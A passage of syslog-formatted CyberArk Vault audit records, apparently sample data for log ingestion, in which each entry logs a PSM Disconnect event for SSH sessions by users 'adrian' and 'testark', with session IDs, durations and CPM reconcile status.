09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:55:02</Timestamp>\n    <IsoTimestamp>2021-03-11T17:55:02Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:42</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:42Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:30</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:54</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:51:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:51:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:30</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:34:50</Timestamp>\n    <IsoTimestamp>2021-03-15T10:34:50Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 04:12:09</Timestamp>\n    <IsoTimestamp>2021-03-15T11:12:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:36</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
